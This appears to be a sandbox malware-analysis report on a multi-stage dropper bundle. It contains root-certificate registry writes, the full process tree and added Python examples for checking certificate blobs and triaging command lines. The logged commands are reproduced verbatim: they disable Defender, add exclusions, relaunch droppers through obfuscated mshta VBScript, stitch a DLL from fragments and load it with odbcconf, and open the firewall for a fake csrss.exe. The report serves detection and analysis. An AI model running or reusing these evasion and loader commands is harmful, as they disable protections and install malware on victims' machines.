| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (value not reproduced in this copy of the report) | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
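Both ROOT-store key names in the table above are SHA-1 thumbprints of public CA roots: CABD2A79A1076A31F21D253635CB039D4329A5E8 is ISRG Root X1 (the Let's Encrypt root) and DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 is DigiCert Global Root G2, whose name is spelled out in the DER of the second Blob. Installing a root the whole web already trusts does not give the attacker any trust the system would not otherwise grant, so these two rows are weak evidence on their own; the rows become significant if a thumbprint that is not a known public root appears, or if the certificate embedded in the Blob does not actually hash to the thumbprint the key is named after. The Python below is an added example, not output from the sandbox: it parses the Blob's property records, checks the embedded certificate against the SHA-1 property, and sanity-checks the outer DER length. The 32-byte SHA-1 property is taken verbatim from the DF3C... Blob above; the certificate bytes used for the round-trip check are a constructed placeholder, not a real X.509 certificate.

```python
"""Parse and sanity-check a SystemCertificates\\<store>\\Certificates\\<thumbprint>\\Blob value.

Added example, not part of the sandbox report. Windows serialises a stored
certificate as a sequence of property records:

    DWORD propid | DWORD reserved (always 1) | DWORD length | length bytes of data

CERT_SHA1_HASH_PROP_ID (3) carries the thumbprint the key is named after and
CERT_CERT_PROP_ID (32) carries the DER-encoded certificate itself.
"""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 0x03
CERT_CERT_PROP_ID = 0x20

# First 32 bytes of the DF3C24F9... Blob from this report: the SHA-1 property record only.
REPORT_SHA1_PROPERTY_HEX = (
    "030000000100000014000000"
    "df3c24f9bfd666761b268073fe06d1cc8d4f82a4"
)


def sha1_hex(data: bytes) -> str:
    """Upper-case hex SHA-1, the form Windows uses for the key name."""
    return hashlib.sha1(data).hexdigest().upper()


def parse_blob(blob: bytes) -> dict[int, bytes]:
    """Split a Blob value into {propid: data}; raises ValueError on a truncated record."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        propid, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved} in property {propid:#x}")
        if off + length > len(blob):
            raise ValueError(f"property {propid:#x} claims {length} bytes, only {len(blob) - off} remain")
        props[propid] = blob[off:off + length]
        off += length
    return props


def der_sequence_length(der: bytes) -> int:
    """Total encoded size (tag + length field + content) of the outer DER SEQUENCE."""
    if len(der) < 2 or der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    first = der[1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    if len(der) < 2 + n:
        raise ValueError("truncated DER length field")
    return 2 + n + int.from_bytes(der[2:2 + n], "big")


def check_blob(key_thumbprint: str, blob: bytes) -> dict:
    """Cross-check the key name, the SHA-1 property and the embedded certificate."""
    props = parse_blob(blob)
    sha1_prop = props.get(CERT_SHA1_HASH_PROP_ID)
    cert = props.get(CERT_CERT_PROP_ID)
    result = {
        "thumbprint_prop": sha1_prop.hex().upper() if sha1_prop else None,
        "key_matches_prop": sha1_prop is not None and sha1_prop.hex().upper() == key_thumbprint.upper(),
        "cert_present": cert is not None,
        "cert_matches_prop": None,        # None when no certificate property is present
        "der_length_ok": None,
    }
    if cert is not None:
        result["cert_matches_prop"] = sha1_prop == hashlib.sha1(cert).digest()
        result["der_length_ok"] = der_sequence_length(cert) == len(cert)
    return result


def build_blob(cert_der: bytes) -> bytes:
    """Serialise a certificate the way Windows does: SHA-1 property first, then the cert."""
    def record(propid: int, data: bytes) -> bytes:
        return struct.pack("<III", propid, 1, len(data)) + data
    return record(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(cert_der).digest()) + record(CERT_CERT_PROP_ID, cert_der)


# Constructed stand-in for a certificate: a DER SEQUENCE with a long-form length
# (0x82 0x00 0x10) and 16 bytes of dummy content. Not a real X.509 structure.
DUMMY_CERT = b"\x30\x82\x00\x10" + bytes(range(16))

if __name__ == "__main__":
    print("thumbprint property from the report:",
          parse_blob(bytes.fromhex(REPORT_SHA1_PROPERTY_HEX))[CERT_SHA1_HASH_PROP_ID].hex().upper())
    print("round trip on constructed blob:", check_blob(sha1_hex(DUMMY_CERT), build_blob(DUMMY_CERT)))
```

To apply this to a live host, export the Blob value with reg.exe or winreg, feed the bytes to check_blob together with the key name, and compare any thumbprint whose certificate is not in a trusted-root list you maintain. A mismatch between key name, SHA-1 property and certificate hash means the value was written by something other than CryptoAPI.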
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
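The Processes list that follows is where the summary's behaviours become concrete. The installer chain turns off Defender real-time protection and cloud reporting with Set-MpPreference and excludes its own Temp directory with Add-MpPreference. The mshta.exe VBScript: one-liners copy a dropper to a random file name, start the copy with a -P... argument and, only when that argument is empty (the if "" == "" test on the first run), taskkill the original image; the relaunched copy passes the argument, so the comparison fails and the kill is skipped. A further pair of mshta/cmd lines rebuilds a DLL on disk from headerless fragments by echoing MZ into a file and concatenating the fragments with copy /b, then loads it with odbcconf.exe /A { regsvr ... } and runs del /Q * on the working directory. One of those chains appends 0%time%tQM as the last fragment, so the assembled ..\JEnnF1QU.UEN has a different hash on every run and is a poor file-hash indicator; the fragment names and the odbcconf invocation are the stable part. The Python below is an added example, not sandbox output: case-insensitive triage rules over command lines (the loader randomises letter case: TyPe, cOPY, starT), run against lines copied from this report plus two constructed benign lines. The rule names are the example's own.

```python
"""Command-line triage rules for the process tree in this report.

Added example, not part of the sandbox output. SAMPLES holds command lines copied
from the report's Processes list; the two entries marked benign are constructed.
"""
import re

RULES = [
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("defender_cloud_off",
     re.compile(r"-MAPSReporting\s+Disable|-SubmitSamplesConsent\s+NeverSend", re.I)),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I)),
    ("mshta_inline_vbscript",
     re.compile(r'mshta(\.exe)?"?\s+vbscript:', re.I)),
    ("odbcconf_regsvr",                      # LOLBin DLL load: odbcconf /A { regsvr file }
     re.compile(r"odbcconf(\.exe)?\s+/a\s*\{\s*regsvr\b", re.I)),
    ("pe_header_stitching",                  # echo|set /p="MZ" > hdr & copy /b hdr + frag ... out
     re.compile(r'set\s*/p\s*=\s*"*MZ"*.*\bcopy\s+/b', re.I)),
    ("kills_browser",
     re.compile(r'taskkill\b.*[/-]im\s+"?(chrome|msedge|firefox|iexplore)\.exe', re.I)),
    ("self_relocate_then_kill_origin",       # copy/type self to a new name && start it ... taskkill origin
     re.compile(r"\b(copy\s+/y|type)\s+.*&&\s*start\b.*\btaskkill\b", re.I)),
]


def classify(cmdline: str) -> list[str]:
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def summarize(cmdlines) -> dict[str, int]:
    """Per-rule count of how many of the given command lines triggered it."""
    counts = {name: 0 for name, _ in RULES}
    for line in cmdlines:
        for name in classify(line):
            counts[name] += 1
    return counts


# Copied from this report's Processes list (raw strings, so the backslashes survive).
SAMPLES = {
    "defender_off": r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    "defender_exclusion": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe"',
    "mshta_relocate": r'"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )',
    "mshta_odbcconf": r'"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )',
    "cmd_stitch": r'"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *',
    "kill_chrome": r'cmd.exe /c taskkill /f /im chrome.exe',
    # Constructed benign lines for contrast (the makecab line is routine CBS log compression).
    "benign_makecab": r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108103628.log C:\Windows\Logs\CBS\CbsPersist_20241108103628.cab',
    "benign_getmp": r'powershell -NonInteractive -Command Get-MpPreference | Select-Object DisableRealtimeMonitoring, ExclusionPath',
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(f"{label:20s} {classify(line)}")
    print(summarize(SAMPLES.values()))
```

The rules key on argument shapes rather than file names, because every dropped name here is random and the case is scrambled; the fixed tokens (Set-MpPreference, vbscript:, regsvr, MZ with copy /b, the copy-then-start-then-taskkill sequence) are what the loader cannot change without rewriting the technique.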
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe
Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe
Sun1500b8e65c1f53.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 264
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe
Sun1507dd11d509.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe" -u
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun150e9a93676ff.exe
Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15132bf2c585337a0.exe
Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 264
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp" /SL5="$601D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp" /SL5="$10240,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR & copy /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Sun1515dbfc0edab0.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2940 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108103628.log C:\Windows\Logs\CBS\CbsPersist_20241108103628.cab
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
